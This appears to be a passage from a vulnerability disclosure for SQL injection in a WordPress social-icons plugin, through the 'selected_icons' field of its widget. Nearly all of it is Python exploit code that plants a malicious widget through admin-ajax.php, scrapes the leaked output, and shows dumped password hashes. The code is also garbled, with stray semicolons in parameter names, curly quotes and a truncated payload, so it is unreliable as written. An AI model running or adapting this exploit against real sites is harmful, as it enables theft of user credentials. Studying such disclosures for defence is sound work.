The plugin does not sanitize the `selected_icons` attribute of the `cnss_widget` before interpolating it into an SQL statement, so the value reaches the query unescaped and unparameterized, leading to a SQL injection vulnerability.
id
IN({payload}) ORDER BY sortorder # We can escape Parenthesis. Then, trigger SQLi. widget_payload = f"widget-cnss_widget%5B{number_id}%5D%5Btitle%5D=Follow+Usf1" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bwidth%5D=32" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bheight%5D=32" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Balignment%5D=center" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bdisplay%5D=horizontal" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bmargin%5D=4" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Bselected_icons%5D%5B%5D={payload}" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Battr_id%5D=" widget_payload += f"&widget-cnss;_widget%5B{number_id}%5D%5Battr_class%5D=" widget_payload += f"&widget-id;=cnss_widget-{number_id}" widget_payload += f"&id;_base=cnss_widget" widget_payload += f"&widget-width;=250" widget_payload += f"&widget-height;=200" widget_payload += f"&widget;_number={number_id - 1}" widget_payload += f"&multi;_number={number_id}" widget_payload += f"&add;_new=multi" widget_payload += f"&action;=save-widget" widget_payload += f"&savewidgets;={_nonce}" widget_payload += f"&sidebar;=right-sidebar" # Make a Widget res = sess.post( BASE_URL + “/wp-admin/admin-ajax.php”, headers = { “User-Agent” : “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36”, “Content-Type” : “application/x-www-form-urlencoded; charset=UTF-8” }, data = widget_payload, proxies = {“http” :“http://localhost:8080”} ) # setup : widget on the Sidebar res = sess.post( BASE_URL + “/wp-admin/admin-ajax.php”, data = 
f"action=widgets-order&savewidgets;={_nonce}&sidebars;%5Bwp_inactive_widgets%5D=&sidebars;%5Bright-sidebar%5D=widget-24_block-2%2Cwidget-25_block-3%2Cwidget-26_block-4%2Cwidget-27_block-5%2Cwidget-28_block-6%2Cwidget-1_cnss_widget-{number_id}&sidebars;%5Bfooter-sidebar-one%5D=&sidebars;%5Bfooter-sidebar-two%5D=&sidebars;%5Bfooter-sidebar-three%5D=“, headers = { “User-Agent” : “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36”, “Content-Type” : “application/x-www-form-urlencoded; charset=UTF-8” }, proxies = {“http” :“http://localhost:8080”} ) res = sess.get( BASE_URL ) bs = BeautifulSoup(res.text, “lxml”) for item in bs.find_all(“li”, {“class”: f"cn-fa-{title}”}) : print(item.a[‘href’].replace(“fa fa-”, “”)) ‘’’ [RESULT] $P$BohO2pBSHdTTXiCf7/I5ZjYkaTtqNQ1 $P$Bwoef3ORLrOFtqXxZs/pN7uQ6YoP5Z/ $P$B8dtGlBiT38lv2iJ7mSuwv5/hI/mz.0 ‘’’ sess = login(id, pw) exploit(sess)